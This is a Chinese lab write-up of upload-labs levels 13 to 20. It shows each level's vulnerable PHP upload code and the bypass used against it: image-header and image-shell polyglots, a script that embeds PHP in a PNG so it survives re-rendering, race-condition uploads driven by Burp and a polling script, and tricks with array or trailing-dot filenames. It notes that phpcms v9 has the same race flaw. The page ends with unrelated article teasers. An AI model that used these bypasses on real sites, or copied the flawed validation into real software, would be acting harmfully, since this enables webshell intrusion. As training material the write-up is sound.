upload-labs详解(13-20)文件上传分析

目录

upload-labs-env

upload-labs-env第十三关

文件包含漏洞

代码

测试

上传一个.jpg图片

上传一个.png文件

上传一个.gif图片

upload-labs-env第十四关

代码

思路

upload-labs-env第十五关

代码

思路

upload-labs-env第十六关

代码

思路

测试

上传gif格式文件——较简单——比较图片

上传png格式图片——较麻烦

上传jpg格式图片——有一些不能被处理,要多试几次

upload-labs-env第十七关

代码

思路

解题思路

上传测试

使用Burpsuite多次上传

生成

upload-labs-env第十八关

思路

测试

upload-labs-env第十九关

代码

思路一,绕过大小写

思路二

upload-labs-env第二十关

代码

思路

测试


upload-labs-env

upload-labs-env第十三关

文件包含漏洞

以PHP为例,常用的文件包含函数有以下四种 include(),require(),include_once(),require_once()

区别如下:

  • require():找不到被包含的文件会产生致命错误,并停止脚本运行

  • include():找不到被包含的文件只会产生警告,脚本继续执行

  • require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含

  • include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含

网页代码

<?php include $_GET['test']; ?>

php代码

<?php phpinfo(); ?>

利用文件包含,我们通过include函数来执行phpinfo.php页面,成功解析

将phpinfo.php文件后缀改为txt后进行访问,依然可以解析:

将phpinfo.php文件后缀改为jpg格式,也可以解析:

可以看出,include()函数并不在意被包含的文件是什么类型,只要有php代码,都会被解析出来。

代码

function getReailFileType($filename){
    
    //fopen — 打开文件或者 URL
    //r - 表示以只读方式打开文件,文件必须存在,b表示以二进制方式打开文件,如果不加b,表示默认加了t,即以文本方式打开文件
    $file = fopen($filename, "rb");
    
    //fread — 读取文件(可安全用于二进制文件),最多读取2字节
    $bin = fread($file, 2); //只读2字节
    
    //fclose — 关闭一个已打开的文件指针,将file指向的文件关闭
    fclose($file);
    
    //unpack 是 PHP 中用于解包二进制数据的函数,它可以将二进制字符串解析为 PHP 数组
    //@:错误控制运算符,用于抑制可能的警告或错误
    //C:表示无符号字符(unsigned char),占用 1 字节,范围为 0 到 255
    //2:表示解析 2 个字节
    $strInfo = @unpack("C2chars", $bin);
    
    //intval - 获取变量的整数值
    //将 $strInfo['chars1'] 和 $strInfo['chars2'] 的值拼接成一个字符串,然后将其转换为整数
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    
    //文件的后缀(如 .jpg, .png, .gif)通常是通过文件的**魔数(Magic Number)**来确定的,而不是直接通过文件的后缀名。魔数是文件开头的特定字节,用于标识文件的类型。解析前两个字节并拼接后得到的结果,实际上是文件魔数的一部分,用于匹配文件类型。
    //JPEG:文件头的前两个字节是 0xFFD8,转换为十进制是 255216
	//PNG:文件头的前两个字节是 0x8950,转换为十进制是 13780
	//GIF:文件头的前两个字节是 0x4749,转换为十进制是 7173
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

测试

先上传一个index.jgp,上传失败,后端对图片内容有检测,使用白名单,只能上传规定格式的文件

使用文件包含,使图片文件中包含php代码生成图片码

copy 00000.jpg /b + test.php /a test.jpg

上传一个.jpg图片

复制图片地址,转到文件包含漏洞的位置

使用get传递file

包含成功

上传一个.png文件

上传一个.gif图片

我们使用010editor编辑index.php文件,在文件头加上gif文件的头,

上传访问

upload-labs-env第十四关

代码

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    
    //file_exists — 检查文件或目录是否存在
    if(file_exists($filename)){
        
        //getimagesize — 取得图像大小
        $info = getimagesize($filename);
        
        //image_type_to_extension — 取得图像类型的文件后缀
        $ext = image_type_to_extension($info[2]);
        
        //stripos — 查找字符串首次出现的位置(不区分大小写)
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;

//isset — 检测变量是否已声明并且其值不为 null
if(isset($_POST['submit'])){
    
    //获取上传文件的临时路径
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        
        //move_uploaded_file — 将上传的文件移动到新位置
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

思路

和十三关类似,我们上传一个文件包含的图片

我们使用010editor编辑index.php文件,在文件头加上gif文件的头,

upload-labs-env第十五关

代码

function isImage($filename){
    //需要开启php_exif模块
    
    //exif_imagetype — 判断一个图像的类型
    //exif_imagetype() 读取一个图像的第一个字节并检查其签名。
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

思路

也是判断上传文件类型

 //exif_imagetype — 判断一个图像的类型
 //exif_imagetype() 读取一个图像的第一个字节并检查其签名。

上传测试

upload-labs-env第十六关

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    //basename — 返回路径中的文件名部分
    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    //strrchr — 查找指定字符在字符串中的最后一次出现
    //substr从查找的位置按照0,1,2......顺序返回后面的字符
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            //imagecreatefromjpeg — 由文件或 URL 创建一个新图象。
            //图片文件上传之后,打乱生成一个新图片,我们可以找到没有打乱的部分,修改为一句话木马
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                
                //strval — 获取变量的字符串值
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

思路

寻找没有打乱的部分,上传一句话木马

测试

上传图片,下载被上传之后的图片

上传一个含有一句话木马的test_j.jpg

?? JFIF  ? ?  ? C 
  








? C		


?   [" ?            	

? ?   } !1AQa "q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼??         	

? ?   w !1AQ aq"2?B憽绷	#3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? 齋⒕h?E??颠坾x鈅
x寐V荕礆?e笣A侷鈶p??僯酻Y穾撪弢S'目? 黓姱|!=澱幖盅[茌Y^D?
琟le7F?B独I?y)w苦鵢饩?k鵞馡/V{?Q@聤(???????彽x 倐	x⑦煤暉€4兴﹊焙嵁?YaY?+$珒滎婘_??醂^x玘誹栺7?Wz泛殖鯽k瀂鄠??Q€輲X?<zeG輮彲?/螓?摀~焺T@(QE QE QE QE??php
phpinfo();
?>

下载被上传后的文件

?? JFIF      ? >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
? C     		



 $.' ",#(7),01444'9=82<.342? C			


2!!22222222222222222222222222222222222222222222222222?   [" ?            	

? ?   } !1AQa "q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼??         	

? ?   w !1AQ aq"2?B憽绷	#3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? 麝+嚫蛔?塛??T:l7
錋J$gq??澕?类sW</猨']讄?┹嬮t讑Hn蘪?R唀w.?# -Du碤E
(
(
(
(<趉MF屪铴j1贠?D饄袶徝(e>鄦廕挈=徇靑o飊n皖Ж?汗螯祄"&N誙?撟$猪-
@?QE QE QE QE QE ?

已经将php代码打乱

上传gif格式文件——较简单——比较图片

先找一个gif文件

我们使用010editor软件进行比较

打开工具,比较,选择文件

找到相同部分

我们在文件,插入一句话木马,尽量在00字段插入,不会影响数据

重新上茶访问

上传png格式图片——较麻烦

这里我们使用脚本

demo.php

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

网站打开文件demo.php

运行后得到1.png.上传后下载到本地打开如下图

使用010editor打开,发现一句话木马已经存在了,现在就可以上传运行了

上传jpg格式图片——有一些不能被处理,要多试几次

也是使用脚本

随便找一个jpg图片,先上传至服务器然后再下载到本地保存为1.jpg.

插入php代码

使用脚本处理1.jpg,命令php demo.php 1.jpg

使用16进制编辑器打开,就可以看到插入的php代码.

将生成的payload_1.jpg上传.

将上传的图片再次下载到本地,使用16进制编辑器打开

可以看到,php代码没有被去除. 证明我们成功上传了含有php代码的图片.

需要注意的是,有一些jpg图片不能被处理,所以要多尝试一些jpg图片.

upload-labs-env第十七关

代码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    
    //array — 新建一个数组
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    
    //获取文件后缀
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        
        //in_array — 检查数组中是否存在某个值
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
            
            //rename — 重命名一个文件或目录
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            
            //unlink — 删除文件
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

思路

代码处理流程

  • 移动文件到指定路径

  • 判断文件后缀是否符合

  • 符合则重命名

  • 不符合则删除文件

错误点:

先上传,后删除,中间有一个极短的窗口期,文件是在服务器中的,可以进行操作

漏洞:

条件竞争漏洞

在phpcmsv9也有同样的漏洞,可以直接上传webshell

解题思路

创建一个新木马文件creat.php,用于执行时则创建一个info1.php文件

<?php 
    
    //fputs - fwrite的别名 — 写入文件(可安全用于二进制文件)
    //fopen — 以写入的方式打开文件或者 URL
    fputs(fopen('../web.php','w'),'<?php phpinfo();?>');?>
<?php 
    
    //file_put_contents — 将数据写入文件
    file_put_concents('../shell.php','<?php phpinfo();?>');?>

建议生成文件到上一层目录

因为同级目录可能会循环删除

上传测试

我们发现上传就被删掉了

使用Burpsuite多次上传

发送到攻击器

添加payload爆破

持续发包

持续的发包,我们也需要不间断的去访问

我们也可以使用Burpsuite不间断的去访问,比手动效率高

生成

在上级目录已经生成web.php文件

访问成功

upload-labs-env第十八关

思路

上传的文件还是先上传,后重命名

使用文件包含,上传一个图片码,在后端代码执行到重命名之前,使用客户端访问到

测试

测试图片码的phpinfo();可不可以执行

可以执行

编辑demo.php

<?php fputs(fopen('../web123.php','w'),'<?php phpinfo();?>');?>

生成图片码

查看图片码

上传抓包爆破

访问查看是否成功

也可以使用Python脚本查看是否有成功的案例

import requests
url = "http://10.212.99.94/include.php?file=upload/web123.png"
while True:
    html = requests.get(url)
    if ('Warning' not in str(html.text)):
        print('ok')
        break

在上一级目录中生成了重命名后的文件,我们访问可以看到图片码上传成功,

对于没有被重命名的文件,重复上传,是否成功,有一定的运气在其中

upload-labs-env第十九关

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    
    //file_exists — 检查文件或目录是否存在
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        
        //pathinfo — 返回文件路径的信息
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        
        //in_array — 检查数组中是否存在某个值
        if(!in_array($file_ext,$deny_ext)) {
            
            //$_FILES — HTTP 文件上传变量
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

思路一,绕过大小写

直接上传一个info.phP文件,然后再修改上传名称即可成功上传。

访问

思路二

没有对上传的文件做判断,只对用户输入的文件名做判断 后缀名黑名单 上传的文件名用户可控 黑名单用于用户输入的文件后缀名进行判断 move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.

先准备PHP一句话木马,并把后缀名改为PNG再上传

然后用BP来抓包,效果如下图,就是在upload-19.jpg改为upload-19.php/.

因为Windows的特性后缀改为indexp.php.也可

上传成功

upload-labs-env第二十关

代码

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    
    //检查上传的文件类型是否在白名单中
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        //如果输入的save_name为空,那么使用原始的文件名,否则使用save_name上传的文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            
            //explode — 使用一个字符串分割另一个字符串
            //strtolower — 将字符串转化为小写
            $file = explode('.', strtolower($file));
        }

        
        //end — 将数组的内部指针指向最后一个单元
        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            
            //reset — 将数组的内部指针指向第一个单元
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

函数分析

php
empty()   		 //函数用于检查一个变量是否为空。
explode(separator,string,limit) 		 //函数把字符串打散为数组。
                separator 	必需。规定在哪里分割字符串。
                string 	必需。要分割的字符串。
                limit 	可选。规定所返回的数组元素的数目。

                可能的值:

                大于 0 - 返回包含最多 limit 个元素的数组
                小于 0 - 返回包含除了最后的 -limit 个元素以外的所有元素的数组
                0 - 返回包含一个元素的数组

strtolower() 	 //把所有字符转换为小写:  
count()  		 //计算数组中的单元数目,或对象中的属性个数
end() 			 //函数将内部指针指向数组中的最后一个元素,并输出。    
reset()    		 //输出数组中的当前元素和下一个元素的值,然后把数组的内部指针重置到数组中的第一个元素:

思路

需要绕过对非数组进行分割

如果将数组传为save_name=["muma.php",不设置,"jpg"],当我们save_name[1]不设置的时候,count结果仍然是2,但是文件名后缀拼接出来为空,结果为muma.php. 再根据windows特性将.省略,达到文件上传的目的

测试

burpsuite改包

上传查看

我们使用vscode来debug一下,看一下代码内部的走向

if(!empty($_FILES['upload_file'])){

上传不为空,进入if条件语句

$allow_type为image/jpeg

继续

检测上传文件的种类在不在数组$allow_type中

在,进入else条件语句

检测到

传入save_name是个数组,有值,赋值给$file

if (!is_array($file)) {

检测$file是否数组,如果不是,分割成数组

是数组,绕过if条件语句

$ext = end($file);

将数组的最后一位赋值给$ext

即$ext = array(2) = jpg

xxxxxxxxxx2 1    $allow_suffix = array('jpg','png','gif');2    if (!in_array($ext, $allow_suffix)) {

$ext是否在白名单中

进入else条件判断

拼接赋值,数组中第一个值拼接数组中array(数组长度-1)的值

$file_name = test.php.

			//reset — 将数组的内部指针指向第一个单元
            $file_name = reset($file) . '.' . $file[count($file) - 1];

Windows存储模式,忽略后面的 . 存储为test.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/982908.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

探索高性能AI识别和边缘计算 | NVIDIA Jetson Orin Nano 8GB 开发套件的全面测评

随着边缘计算和人工智能技术的迅速发展&#xff0c;性能强大的嵌入式AI开发板成为开发者和企业关注的焦点。NVIDIA近期推出的Jetson Orin Nano 8GB开发套件&#xff0c;凭借其40 TOPS算力、高效的Ampere架构GPU以及出色的边缘AI能力&#xff0c;引起了广泛关注。本文将从配置性…

字典树(trie树)详解

【本文概要】本文主要介绍了字典树的概念&#xff0c;字典树的一般算法&#xff0c;包括初始化&#xff0c;插入&#xff0c;查找等&#xff0c;最后举了比较典型的案例来辅助理解字典树这种特殊的数据结构。 1、什么是字典树 字典树&#xff0c;是一种特殊的树状数据结构&…

从CL1看生物计算机的创新突破与发展前景:技术、应用与挑战的多维度剖析

一、引言 1.1 研究背景与意义 随着科技的飞速发展&#xff0c;计算机技术已经成为推动现代社会进步的核心力量之一。从最初的电子管计算机到如今的大规模集成电路计算机&#xff0c;计算机的性能得到了极大的提升&#xff0c;应用领域也不断拓展。然而&#xff0c;传统计算机…

小兔鲜Vue3

counterStore里面包含着对象返回的东西。 getters就是conputer git initgit add .git commit -m " " jsconfig进行路径提示。vite.config.js进行实际路径转化。 第一个文件做好就是一个axios实例了&#xff0c;可以直接调用方法。 在第二个文件是实例.get 写好路…

驱动 AI 边缘计算新时代!高性能 i.MX 95 应用平台引领未来

智慧浪潮崛起&#xff1a;AI与边缘计算的时代 正悄然深植于我们的日常生活之中&#xff0c;无论是火热的 ChatGPT 与 DeepSeek 语言模型&#xff0c;亦或是 Meta 智能眼镜&#xff0c;AI 技术已经无形地影响着我们的生活。这股变革浪潮并未停歇&#xff0c;而是进一步催生了更高…

STM32之软件SPI

SPI传输更快&#xff0c;最大可达80MHz&#xff0c;而I2C最大只有3.4MHz。输入输出是分开的&#xff0c;可以同时输出输入。是同步全双工。仅支持一主多从。SS是从机选择线。每个从机一根。SPI无应答机制的设计。 注意&#xff1a;所有设备需要共地&#xff0c;时钟线主机输出&…

深度学习系列79:Text2sql调研

参考 https://github.com/topics/text-to-sql 这里是一些资源&#xff1a;https://github.com/eosphoros-ai/Awesome-Text2SQL/blob/main/README.zh.md 这里是综述文章&#xff1a;https://zhuanlan.zhihu.com/p/647249972 1. 数据集 Spider: 一个跨域的复杂text2sql数据集&a…

【Unity】 HTFramework框架(六十一)Project窗口文件夹锁定器

更新日期&#xff1a;2025年3月7日。 Github源码&#xff1a;[点我获取源码] Gitee源码&#xff1a;[点我获取源码] 索引 Project窗口文件夹锁定器框架文件夹锁定自定义文件夹锁定限制条件 Project窗口文件夹锁定器 在Project窗口中&#xff0c;文件夹锁定器能够为任何文件夹加…

nginx服务器实现上传文件功能_使用nginx-upload-module模块

目录 conf文件内容如下html文件内容如下上传文件功能展示 conf文件内容如下 #user nobody; worker_processes 1;error_log /usr/logs/error.log; #error_log /usr/logs/error.log notice; #error_log /usr/logs/error.log info;#pid /usr/logs/nginx.pid;even…

基于云的内容中台核心优势是什么?

弹性云架构赋能资源整合 现代企业通过弹性云架构实现多源数据资源的深度整合&#xff0c;其动态扩展能力可自动适配业务流量波动。基于分布式存储与容器化部署&#xff0c;系统能够无缝对接CRM、ERP等企业软件集成&#xff0c;实现跨平台数据实时同步。值得注意的是&#xff0…

*图论基础(5)

持续更新... 1.图的基本概念 不写了&#xff0c;网上有好多资料ovo 2.图的存储和遍历 2.1存储&#xff1a; 3.最小生成树 3.2Kruskal算法 4.拓扑排序 拓扑排序的⽬标是将有向⽆环图中的所有结点排序&#xff0c;使得排在前⾯的结点不能依赖于排在后⾯的结 点。在课程问题中…

DeepSeek 助力 Vue3 开发:打造丝滑的表格(Table)示例3: 行选择

前言&#xff1a;哈喽&#xff0c;大家好&#xff0c;今天给大家分享一篇文章&#xff01;并提供具体代码帮助大家深入理解&#xff0c;彻底掌握&#xff01;创作不易&#xff0c;如果能帮助到大家或者给大家一些灵感和启发&#xff0c;欢迎收藏关注哦 &#x1f495; 目录 Deep…

DevSecOps CI/CD 管道中数字供应链安全的集成策略

前言&#xff1a; 在敏捷开发的模式下&#xff0c;应用程序会通过 DevSecOps 的敏捷软件开发生命周期&#xff08;SDLC&#xff09;范式进行开发&#xff0c;并使用持续集成/持续交付&#xff08;CI/CD&#xff09;管道的流程。 然而&#xff0c;在软件开发、供应和交付运营中…

JmeterHttp请求头管理出现Unsupported Media Type问题解决

JmeterHttp请求头管理出现Unsupported Media Type问题解决 大多数的app与pc端压测的时候都会出现这种情况 当我们在jemter测试当中当中遇见Unsupported Media Type&#xff0c;有一种可能就是我们请求的网页的content-Type的类型与我们测试的时候的类型不一致 解决方法 可以添…

STM32 子设备通过CAN发送数据到主设备

采集ADC、GPS经纬坐标、温湿度数据、大气压数据通过CAN方式发送给主设备端&#xff0c;帧ID按照如下定义&#xff1a; 我尼玛一个标准帧ID位数据是11位&#xff0c;扩展帧才是111829位&#xff0c;它说最开头的是四位是真类型&#xff0c;并给我如下解释&#xff1a; 它把帧的定…

基于深度学习的青花瓷图像检索系统开发与实现

目录 1.研究背景与目的 1.1课题背景 1.2研究目的 二、调研资料情况 2.1图像分割研究现状 2.2图像检索调研 2.2.1选择深度学习进行检索的原因及优势 2.2.2基于深度学习的图像检索技术的发展 2.2.3基于深度学习的图像检索的研究重点 2.3基于深度学习的图像检索方法调研 …

FreeRTOS学习(七):通过实例深入理解栈的作用(二)

FreeRTOS学习&#xff08;七&#xff09;&#xff1a;通过实例深入理解栈的作用&#xff08;二&#xff09; 文章目录 FreeRTOS学习&#xff08;七&#xff09;&#xff1a;通过实例深入理解栈的作用&#xff08;二&#xff09;前言一、栈的深度局部变量调用深度 总结 前言 看…

[傻瓜式教学]如何将MathType公式编辑器内嵌到WPS工具栏中

[傻瓜式教学]如何将MathType公式编辑器内嵌到WPS工具栏中 将MathType公式编辑器内嵌到WPS工具栏中 下载好所需文件 我用夸克网盘分享了「mathtype安装教程超简单易上手.zip」&#xff0c;点击链接即可保存。打开「夸克APP」 链接&#xff1a;https://pan.quark.cn/s/4726c684…

网络安全整改措施复函

&#x1f345; 点击文末小卡片 &#xff0c;免费获取网络安全全套资料&#xff0c;资料在手&#xff0c;涨薪更快 以计算机安全的主要因素为突破口&#xff0c;重点防范各种不利于计算机网络正常运行的措施&#xff0c;从不同角度全面了解影响计算机网络安全的情况&#xff0c;…

基于大数据的全国地铁数据可视化分析系统

【大数据】基于大数据的全国地铁数据可视化分析系统&#xff08;完整系统源码开发笔记详细部署教程&#xff09;✅ 目录 一、项目简介二、项目界面展示三、项目视频展示 一、项目简介 &#x1f31f; 技术特点✔️ PythonFlask黄金架构&#xff0c;Bootstrap塑造友好交互界面 ✔…